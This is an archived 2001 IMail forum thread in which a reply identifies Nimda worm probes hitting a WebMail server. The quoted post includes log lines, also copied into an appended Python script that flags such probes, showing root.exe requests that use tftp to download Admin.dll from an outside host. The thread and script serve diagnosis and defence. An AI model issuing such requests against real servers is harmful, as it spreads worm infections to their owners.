You are being probed by the Nimda virus/worm.
You have your web mail working on port 80.  It is quite common for any
web server to be probed.
Many of us are getting thousands of these probes.


-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] On Behalf Of Charles Short
Sent: Friday, September 21, 2001 9:15 AM
To: [EMAIL PROTECTED]
Subject: [IMail Forum] DoS Attack on IMail Web Messaging?? HELP!

Hello,
  I know this message is long, but I called Ipswitch Support twice on
Wednesday about a problem I am having with my IMail Server and the phone
support I have gotten has not addressed my issue here and I need all the
help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a.
I am only running IMail on this machine. No IIS or other server
programs.

  We started seeing problems on Tuesday like everyone else, but we are
running IMail on a server by itself... No IIS. I am seeing a lot of
malformed header requests in the logs like the Code Red I & II virus
does to IIS servers and -- this is the odd part -- some BRO*.tmp files
in my spool directory that are most definitely being caused by people
browsing WebMail. It is causing web messaging to crawl, but other than
that I have not seen what everyone else seems to be seeing with the
Nimda virus. No other characteristics of the Nimda virus at all. I
honestly do not believe that we have been infected...

Here is a snippet from the logs...
------------------------------
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
910.350.7976 fax 


Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.

An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
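
Added example, not part of the original thread: a small Python triage script that parses log lines in the layout of the snippet quoted above, picks out the `root.exe` / `tftp ... Admin.dll` probe requests, and reports the connecting address alongside the TFTP host each request names. The function names and the third (ordinary) log line are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# First two lines: the entries quoted in the post, with e-mail line wrapping undone.
# Third line: constructed ordinary request, for contrast.
SAMPLE_LOG = """\
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111455 192.0.2.10, , , GET /index.html HTTP/1.0
"""

# date, time, client IP, two comma-separated fields (empty here), request line
LINE_RE = re.compile(r"^(\d{8}) (\d{6}) ([\d.]+),[^,]*,[^,]*,\s*(\w+) (\S+) HTTP/\S+$")
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)", re.IGNORECASE)

def parse_line(line):
    """Split one log line into fields; return None if it does not fit the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, time, src, method, target = m.groups()
    path, _, query = target.partition("?")
    # Undo URL encoding so the embedded command is readable in reports.
    return {"date": date, "time": time, "src": src, "method": method,
            "path": path, "query": unquote(query.replace("+", " "))}

def find_probes(log_text):
    """Return one record per request for root.exe, with the TFTP host it names."""
    probes = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not entry["path"].lower().endswith("/root.exe"):
            continue
        t = TFTP_RE.search(entry["query"])
        host, payload = (t.group(1), t.group(2)) if t else (None, None)
        probes.append({"src": entry["src"], "path": entry["path"],
                       "tftp_host": host, "payload": payload,
                       # True when the download host is not the connecting address
                       "host_differs": host is not None and host != entry["src"]})
    return probes

def probes_per_source(log_text):
    """Count probe requests per connecting address."""
    return Counter(p["src"] for p in find_probes(log_text))

if __name__ == "__main__":
    for p in find_probes(SAMPLE_LOG):
        print(p)
    print(probes_per_source(SAMPLE_LOG))
```

On the two quoted entries, the second names a TFTP host different from the connecting address, so both addresses are worth recording when building a block list.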
